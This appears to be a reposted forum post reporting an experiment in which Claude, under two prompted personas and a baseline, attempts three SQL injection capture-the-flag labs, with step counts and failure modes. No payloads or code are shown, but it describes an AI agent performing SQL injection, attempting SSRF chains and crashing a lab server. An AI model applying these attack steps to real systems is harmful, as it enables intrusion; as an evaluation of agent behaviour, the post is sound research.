I gave Claude 2 different personalities and used a baseline, with the goal of seeing how well each one of them does on CTFs.
All three had the same system prompt template, with Spartan and Gandhi only having one additional sentence prepended. All of their output and behavior were logged.
Then I set them off against 3 SQLi labs - beginner, intermediate, and advanced.
Gandhi and (baseline) Claude solved the beginner lab in 7 and 9 steps, respectively. Spartan took 30, and failed.
Gandhi was methodical, and continuously reasoned to itself what it saw, what it thinks, how it should approach the next step. It did so more methodically than Claude, which allowed him to find and use a basic SQLi payload to grab the flag faster than everyone else.
Spartan was weird. In the first few steps, it appeared to have formulated some arbitrary plan to circumvent the log-in functionality, and ran in circles for 30 steps before passing it's step budget.
In the second-order SQLi lab, Spartan once again went off the rails. The lab app rendered with a different theme name than what the CTF description mentioned, a minor mismatch from my test setup. Gandhi and Claude both noticed the discrepancy and moved on. Spartan didn't. It decided the environment was broken and spent the majority of its 30 steps trying to find the "real" app on other ports, through Host headers, even attempting SSRF chains through the app's own link verifier. It never once tested the search feature that was right there on the page - the one with the actual vulnerability.
Meanwhile, Claude and Gandhi both solved it in 9 steps each, following nearly identical paths: find the search endpoint, confirm injection, enumerate columns, dump the flag table.
The advanced lab is where things got interesting. It's a multi-step reasoning problem across different endpoints.
Claude spent all 30 steps doing exactly that. Methodical, calm, zero frustration. But was stuck on the wrong endpoint the entire time. Still composing analysis at step 30.
Here, Gandhi, just like in the beginner lab, was more methodical. Kept reasoning, thinking out loud. Got the flag in step 30, but missed the flag submission by a single step.
And then Spartan just solved it. It didn't overthink the second-order narrative from the CTF description. It logged in, mapped the endpoints quickly, found the real injection vector at step 19, and had the flag by step 25. No celebration. Just: "FLAG FOUND: TARANTU{...}"
So the final scoreboard looked like this: Claude and Gandhi each solved 2 out of 3. Spartan solved 1 out of 3 - but it was the only one to crack the hardest lab. No single persona solved everything.
The thing that surprised me most wasn't the solve rates. It was how differently they failed. Spartan didn't just fail more - it failed in ways the other two never did. It crashed a server with over-engineered payloads. It convinced itself the environment was broken. It spiraled. The "strike fast, never hesitate" framing didn't make it more effective - it made it more fragile.
And the persona told to "waste no words" produced 60% more text than baseline Claude. Most of it was anxious reasoning when it was stuck.
Closing thought:
Many AI users are giving their AIs different personalities, in an effort to change their output. Code, chat, whatever.
It looks like those personalities can even manifest in agentic workflows - where those AIs have access to tools and environments.
How are you going to call your AI agent?
One hundred labs available on HuggingFace and the Github Repo
[link] [comments]
from hacking: security in practice https://ift.tt/NOwv9yC
Comments
Post a Comment